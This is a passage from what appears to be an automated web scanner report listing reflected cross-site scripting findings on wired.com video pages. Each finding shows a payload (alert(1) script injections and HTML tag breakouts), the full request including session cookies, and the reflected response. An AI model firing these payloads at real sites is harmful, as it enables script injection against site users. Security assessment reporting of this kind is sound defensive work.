Date: Mon, 22 Nov 2010 00:36:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /videobae29--><script>alert(1)</script>d1b8c531380/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001
-->
...[SNIP]...

1.1082. http://www.wired.com/video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef811"><a>b1ea23f2dd6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videoef811"><a>b1ea23f2dd6/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29420
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:40:50 GMT
Date: Mon, 22 Nov 2010 00:35:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videoef811"><a>b1ea23f2dd6 ss_latest-videos c_latest">
...[SNIP]...

1.1083. http://www.wired.com/video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c265"-alert(1)-"61910eb5ad7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos9c265"-alert(1)-"61910eb5ad7/latest/1815816633/call-of-duty--afghanistan/664893966001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=272
Expires: Mon, 22 Nov 2010 00:41:55 GMT
Date: Mon, 22 Nov 2010 00:37:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106780


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest","664893966001","1815816633","latest-videos9c265"-alert(1)-"61910eb5ad7","video","call-of-duty--afghanistan"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1084. http://www.wired.com/video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 154f4"><a>d2d236a0fa9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos154f4"><a>d2d236a0fa9/latest/1815816633/call-of-duty--afghanistan/664893966001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:41:38 GMT
Date: Mon, 22 Nov 2010 00:36:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106741


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos154f4"><a>d2d236a0fa9 c_latest">
...[SNIP]...

1.1085. http://www.wired.com/video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed5fe"><a>50a1865d9c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/latested5fe"><a>50a1865d9c9/1815816633/call-of-duty--afghanistan/664893966001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:42:25 GMT
Date: Mon, 22 Nov 2010 00:37:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106766


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_latested5fe"><a>50a1865d9c9">
...[SNIP]...

1.1086. http://www.wired.com/video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf068"-alert(1)-"1f8767402b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latestbf068"-alert(1)-"1f8767402b1/1815816633/call-of-duty--afghanistan/664893966001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:43:30 GMT
Date: Mon, 22 Nov 2010 00:38:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106773


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","664893966001","1815816633","video","call-of-duty--afghanistan","latestbf068"-alert(1)-"1f8767402b1"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1087. http://www.wired.com/video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5270b"-alert(1)-"b5f96d84bd1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/18158166335270b"-alert(1)-"b5f96d84bd1/call-of-duty--afghanistan/664893966001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:43:48 GMT
Date: Mon, 22 Nov 2010 00:38:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106727


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "18158166335270b"-alert(1)-"b5f96d84bd1","latest-videos","latest","664893966001","video","call-of-duty--afghanistan"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1088. http://www.wired.com/video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc71f"-alert(1)-"d498532879a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/call-of-duty--afghanistanfc71f"-alert(1)-"d498532879a/664893966001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:44:18 GMT
Date: Mon, 22 Nov 2010 00:39:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106752


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","call-of-duty--afghanistanfc71f"-alert(1)-"d498532879a","latest","664893966001","1815816633","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1089. http://www.wired.com/video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3463"-alert(1)-"374493d8e16 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001e3463"-alert(1)-"374493d8e16 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=278
Expires: Mon, 22 Nov 2010 00:44:10 GMT
Date: Mon, 22 Nov 2010 00:39:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106727


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","1815816633","664893966001e3463"-alert(1)-"374493d8e16","video","call-of-duty--afghanistan"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1090. http://www.wired.com/video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7340c"><a>8892cc9fb2a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video7340c"><a>8892cc9fb2a/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29448
Vary: Accept-Encoding
Cache-Control: max-age=282
Expires: Mon, 22 Nov 2010 00:38:56 GMT
Date: Mon, 22 Nov 2010 00:34:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video7340c"><a>8892cc9fb2a ss_latest-videos c_latest">
...[SNIP]...

1.1091. http://www.wired.com/video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 6cd9f--><script>alert(1)</script>ad403d2a150 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video6cd9f--><script>alert(1)</script>ad403d2a150/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29487
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:40:09 GMT
Date: Mon, 22 Nov 2010 00:35:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video6cd9f--><script>alert(1)</script>ad403d2a150/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001
-->
...[SNIP]...

1.1092. http://www.wired.com/video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fed2d"><a>6a6f634c6a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videosfed2d"><a>6a6f634c6a7/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=296
Expires: Mon, 22 Nov 2010 00:40:06 GMT
Date: Mon, 22 Nov 2010 00:35:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106787


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videosfed2d"><a>6a6f634c6a7 c_latest">
...[SNIP]...

1.1093. http://www.wired.com/video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17088"-alert(1)-"d5156ec131b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos17088"-alert(1)-"d5156ec131b/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=287
Expires: Mon, 22 Nov 2010 00:41:10 GMT
Date: Mon, 22 Nov 2010 00:36:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106798


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos17088"-alert(1)-"d5156ec131b","latest","678922783001","1815816633","cast-and-crew-talk-tron-reboot-secondskin-light-suits","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1094. http://www.wired.com/video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d11c7"-alert(1)-"40fba69b59c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latestd11c7"-alert(1)-"40fba69b59c/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:42:27 GMT
Date: Mon, 22 Nov 2010 00:37:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106808


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
"text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","678922783001","1815816633","cast-and-crew-talk-tron-reboot-secondskin-light-suits","latestd11c7"-alert(1)-"40fba69b59c","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1095. http://www.wired.com/video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cf86"><a>178493caa5e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

